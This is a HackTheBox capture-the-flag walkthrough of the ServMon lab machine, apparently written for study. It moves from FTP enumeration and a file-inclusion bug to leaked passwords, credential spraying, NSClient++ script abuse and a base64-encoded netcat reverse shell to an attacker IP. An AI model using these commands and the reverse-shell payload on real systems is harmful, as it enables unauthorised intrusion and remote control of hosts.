HackTheBox - ServMon

Nmap scan results
nmap -sC -sV -oA nmap-allportscan -p- 10.10.10.184

Enumerating FTP Server (Anonymous login allowed)


___(root__LAPTOP-UFMALO92)-[/home/akshay/Desktop/HackTheBox/Machines/Windows-Easy/Servmon]
__# cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
__# cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
NVMS-1000 Running on port 80
There is a LFI Vulnerability present for this CMS Software. We can check for it using searchsploit
command in linux.


There was a note saying Nadine left Passwords.txt
file on Nadine's Desktop. We can browse that using Local File Inclusion.

# Contents of Passwords.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
Using crackmapexec to get Valid user with credentials
crackmapexec smb 10.10.10.184 -u users.txt -p pass.txt

I tried to access SMB Shares for Nadine user, but didn't get anything. Instead I only got read access to $IPC
Share. (Not so useful)

SSH Access as Nadine

Exploiting NSClient++ (Remote Code Execution)
We also have NSClient++
running on port 8443, we can get the web interface password for that by browsing the following directory.
cd "C:\Program Files\NSClient++"
type nsclient.ini
// This file contains the web interface password

Another way to get the password is using nscp.exe
executable given on the following website itself.

nscp.exe web -- password --display
Current password: ew2x6SsGTxjRwXOT
The allowed_hosts
are set to 127.0.0.1 and that's the reason we can't access it remotely. We can use SSH Forwarding to bypass this.


Go to Settings -> External Scripts -> Scripts -> Add New
. Then fill in the following details.

Then click on Reload to restart the service and if you will check the queries, this is how it should look.

Now you can run the script by clicking on pleasework that we just created and then further clicking on Run.


Let's try to get a shell now. Get the nc (netcat) executable using curl
command.
echo "C:\temp\nc64.exe 10.10.14.5 9001 -e powershell" | iconv -t utf-16le | base64 -w 0
echo powershell -enc QwA6AFwAdABlAG0AcABcAG4AYwA2ADQALgBlAHgAZQAgADEAMAAuADEAMAAuADEANAAuADUAIAA5ADAAMAAxACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAKAA== > script.bat
Now listen on port 9001
and run the script to get the reverse connection back.

Last updated
Was this helpful?